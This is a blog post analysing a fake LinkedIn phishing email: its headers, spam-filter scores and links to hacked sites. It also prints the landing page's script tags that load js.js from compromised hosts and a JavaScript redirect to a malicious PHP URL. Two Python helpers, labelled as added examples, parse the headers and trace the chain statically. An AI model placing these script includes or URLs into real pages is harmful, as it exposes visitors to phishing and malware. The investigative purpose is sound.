One message, many phishing attempts

The spam filter does a good job of blocking messages, and at times I take a look at why a message was blocked, especially when the reported sender (From: in the header) is one I could expect mail from.

One such message I received today appeared to be sent by LinkedIn, but the full header told me otherwise:
From: "LinkedIn.Invitations" <4930A7EA@binggu.net>
Forged, no doubt.
The full header showed more information on why:
Return-Path: 4930A7EA@binggu.net
Received: from DIANA.INTRA.GROOTERSNET.NL (192.168.0.2)
by diana.intra.grootersnet.nl (V5.6-ECO5, OpenVMS V8.3 Alpha);
Wed, 17 Oct 2012 07:32:51 +0000 (UTC)
X-PMAS-MAIL-FROM: 4930A7EA@binggu.net
Received: from unknown ([190.65.67.127] EXTERNAL) (EHLO [190.65.67.127]) by
diana.INTRA.GROOTERSNET.NL ([192.168.0.200]) (PreciseMail V3.2); Wed, 17 Oct
2012 02:45:11 +0000
From: "LinkedIn.Invitations" <4930A7EA@binggu.net>
To: <willem@grootersnet.nl>
Date: Tue, 16 Oct 2012 21:44:55 -0500
Subject: Invitation
Message-ID: <20121016214455.5D4E447FEC53518BE995C.JavaMail.app@WISAJUWIJHO-PC>
Accept-Language: en-US
Content-Language: en-US
x-linkedin-template: inv_exp_member_02
x-linkedin-class: INVITE-MBR
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-PMAS-External: unknown [190.65.67.127] (EHLO [190.65.67.127])
X-PMAS-Software: PreciseMail V3.2 [121016] (diana.intra.grootersnet.nl)
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REPUTATION_URI_SPAM: URI reputation check (1.000)
X-PMAS-VMF-OK: Envelope FROM: check: Source accepts mail for address (0.000)
X-PMAS-HDR-FROM_HAS_MIXED_NUMS: From: contains numbers mixed in with letters
(0.000)
X-PMAS-HDR-CTYPE_JUST_HTML: HTML-only mail, with no text version (1.500)
X-PMAS-HDR-RCVD_FROM_UNKNOWN: Message received from host without DNS entry
(4.000)
X-PMAS-BDY-TEENY_FONT: Message tries to hide text in teeny-tiny font (5.000)
X-PMAS-META-DEAR_EMAIL_ADDR: Message has "Dear user@domain" greeting (4.000)
X-PMAS-Final-Score: 20.500
X-PMAS-Spam-Level: ********************+
X-PMAS-Spam: Yes
X-PMAS-Quarantined: PreciseMail
X-PMAS-Filename:
PMAS_ROOT:[QUARANTINE.121017.C]SPAM$2012101702451912WIL279F70EA.SPAM

The fact that it was sent from a domain other than LinkedIn's is sufficient reason, and so is each of the "Known phishing URI" hits. To get some insight, I accepted it for easier examination (PMAS' output is not really helpful in these cases) and examined it using the webmail client:
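As an added example (not code from the post), the two checks made above can be done mechanically on the quoted headers: the From: domain is compared with the brand the display name claims, and the PMAS rule scores are re-added. Note that the quoted Final-Score of 20.500 is only reached when the three identical REP_URI-PHISH hits are counted once; the example assumes that is how the filter totals them.

```python
import re

# Constructed from the PMAS header block quoted in the post (scoring headers only).
RAW_HEADERS = """\
From: "LinkedIn.Invitations" <4930A7EA@binggu.net>
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REPUTATION_URI_SPAM: URI reputation check (1.000)
X-PMAS-VMF-OK: Envelope FROM: check: Source accepts mail for address (0.000)
X-PMAS-HDR-FROM_HAS_MIXED_NUMS: From: contains numbers mixed in with letters
 (0.000)
X-PMAS-HDR-CTYPE_JUST_HTML: HTML-only mail, with no text version (1.500)
X-PMAS-HDR-RCVD_FROM_UNKNOWN: Message received from host without DNS entry
 (4.000)
X-PMAS-BDY-TEENY_FONT: Message tries to hide text in teeny-tiny font (5.000)
X-PMAS-META-DEAR_EMAIL_ADDR: Message has "Dear user@domain" greeting (4.000)
X-PMAS-Final-Score: 20.500
"""

# A rule header ends with its score in parentheses, e.g. "(4.000)".
RULE = re.compile(r"^(X-PMAS-[A-Z_-]+):.*\((\d+\.\d+)\)\s*$")

def unfold(raw):
    """Join RFC 5322 folded continuation lines back onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines

def pmas_rule_scores(raw):
    """Map each PMAS rule header to its score. A rule that fired several times
    (the three REP_URI-PHISH lines) is kept once; assumption, see lead-in."""
    scores = {}
    for line in unfold(raw):
        m = RULE.match(line)
        if m:
            scores[m.group(1)] = float(m.group(2))
    return scores

def recomputed_score(raw):
    """Sum of the rule scores, to compare with X-PMAS-Final-Score."""
    return round(sum(pmas_rule_scores(raw).values()), 3)

def from_domain(raw):
    """Domain of the address in From:, to compare with the claimed brand."""
    m = re.search(r"^From:.*@([\w.-]+)>", raw, re.M)
    return m.group(1).lower() if m else None
```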

Apart from the weird greeting (why would LinkedIn address me by my email address?) and the absolutely ridiculous content (if a company requested something like this, I would most certainly NOT accept…), that should raise suspicion in the first place. And as it turned out, each link points to a site that appears to have been hacked, though some have taken action already (or the hack missed its target):

The accept button refers to “http://www.erlebnistour-lausitz.de/a5KYrCG/index.html” (404: Not Found)
The Ignore button refers to “http://mardamusic.com/frH62gSL/index.html”
The signature refers to “http://www.cypressgardenservices.org.uk/AN7iR9/index.html” (403: Forbidden)
“Unsubscribe” refers to “http://www.datalogger.gen.tr/Gw5enj3X/index.html”
“Learn why we include this” refers to “http://ftp.koneks.com.tr/G6mWAUPs/index.html” (404: Not Found)

I’ve investigated similar attempts before, but normally all the links refer to the same site. So this one is more elaborate.

Each site does exist, and each now has a directory added with a random name. I’m rather suspicious in these cases; my expectation is that the docroots of these sites are not set to read-only, or are not even inaccessible from the outside, and that someone was able to push data onto these roots: phishing pages, for instance, or a trojan installer.

So I installed lynx on Diana. This is a text-only web browser that lets you examine the full content and does not execute any scripting; you can store it on disk instead. Though it is available on many platforms, including Windows, the investigation is done on VMS, because that is virtually immune to malware 🙂
Next, I accessed the first site and got the message “Connecting to server”. It comes from HTML source like:

<html>
<table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></html>

Next, there are three pieces of JavaScript, different for each accessible site:
<script type="text/javascript" src="http://mediaess.com/LBXxwGQa/js.js"></script>
<script type="text/javascript" src="http://s154138659.onlinehome.us/FDaCCZkr/js.js"></script>
<script type="text/javascript" src="http://www.baumbach-keramik.de/LwAH4gUo/js.js"></script>

and
<script type="text/javascript" src="http://location-vallee-aspe.com/xSmXWBZW/js.js"></script>
<script type="text/javascript" src="http://patitaspets.com/C44cbsPE/js.js"></script>
<script type="text/javascript" src="http://videosxxx.bz/yYJZQt0x/js.js"></script>

and the file ends normally:

</body>
</html>

That code may cause the installation of malware, so next I accessed the first JavaScript file (at mediaess.com) and got:
[trans.gif] [logo_sl_header.gif] HACKER SAFE certified sites prevent over 99.9% of hacker crime. [text_sl_pnums.gif]
[pic_sl_livechat.gif]

HOME PRODUCTS SUPPORT TESTIMONIALS AFFILIATES ABOUT US VDECK

[sl_snav_sublinks.gif]
Customer Login
Username:
_____________________
Password:
_____________________
Log In
[sl_indexv2_midcurve.gif]

This site has been suspended

If you manage this site and have a question about why the site is not available, please contact us directly.

Home | Hosting | Support | Testimonials | Affiliates | About Us | Site Map | Web Site Hosting
Copyright © 2007 StartLogic. Read our Terms of Service. All rights reserved.

[trans.gif]
So I wondered…. If I had followed the link under “Customer name”, a cookie would have been placed, but I refused that.
The same goes for the third and sixth, which referred directly to the home page, but without a login; the third one requested a cookie, which I did accept.
The second and fourth cannot be accessed (403; the fourth stating that access requires authentication).
But the fifth indeed carried a JavaScript file js.js, which I stored on disk to examine. It consists of a single redirect to a PHP script:

document.location='http://2.bajawinery.com/links/assure_numb_engineers.php';

but when I accessed that URL, the host 2.bajawinery.com could not be found, from Diana anyway.
Running TCPIP$DIG, however, did find that site, but not as expected:
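The chain followed above (landing page, external js.js, location redirect) can be walked without a browser ever executing anything, as this added example shows; it is not the post's code and assumes the script bodies were already fetched and stored to disk with lynx, as described. The landing HTML and script URLs are the ones quoted in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Landing page reconstructed from the HTML quoted in the post.
LANDING_URL = "http://www.erlebnistour-lausitz.de/a5KYrCG/index.html"
LANDING_HTML = """<html>
<table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td>
<div align="center">Connecting to server...</div></td></tr></table>
<script type="text/javascript" src="http://mediaess.com/LBXxwGQa/js.js"></script>
<script type="text/javascript" src="http://s154138659.onlinehome.us/FDaCCZkr/js.js"></script>
<script type="text/javascript" src="http://www.baumbach-keramik.de/LwAH4gUo/js.js"></script>
</body>
</html>"""
# Body of the one js.js the post could retrieve: a bare redirect.
JS_REDIRECT = "document.location='http://2.bajawinery.com/links/assure_numb_engineers.php';"

class ScriptSrcCollector(HTMLParser):
    """Collect <script src=...> values; nothing is fetched or executed."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.srcs += [v for k, v in attrs if k == "src" and v]

def external_scripts(html, page_url):
    """Script URLs loaded from a host other than the page's own."""
    p = ScriptSrcCollector()
    p.feed(html)
    page_host = urlparse(page_url).hostname
    return [s for s in p.srcs if urlparse(s).hostname != page_host]

# document.location='...' / window.location.href="..." style assignments.
REDIRECT = re.compile(r"(?:document|window)\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]")

def redirect_target(js):
    """Destination of a location-assignment redirect, read statically."""
    m = REDIRECT.search(js)
    return m.group(1) if m else None

def follow_chain(html, page_url, js_by_url):
    """Landing page -> each js.js -> redirect target, using already-fetched
    script bodies (js_by_url) so nothing runs in a browser."""
    return [(src, redirect_target(js_by_url.get(src, "")))
            for src in external_scripts(html, page_url)]
```

Scripts whose body could not be retrieved (403, 404, suspended host) simply yield None as their target, which mirrors the dead ends hit above.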
$ dig bajawinery.com
;; reply from unexpected source: 188.142.0.6#53, expected 192.168.0.33#53

; <<>> DiG 9.3.1 <<>> bajawinery.com
;; global options: printcmd
;; connection timed out; no servers could be reached
$
but that unexpected source is a DNS server at my ISP.

The state may have changed and action been taken, and I couldn’t find the cookie I saved… so there the trail ended.
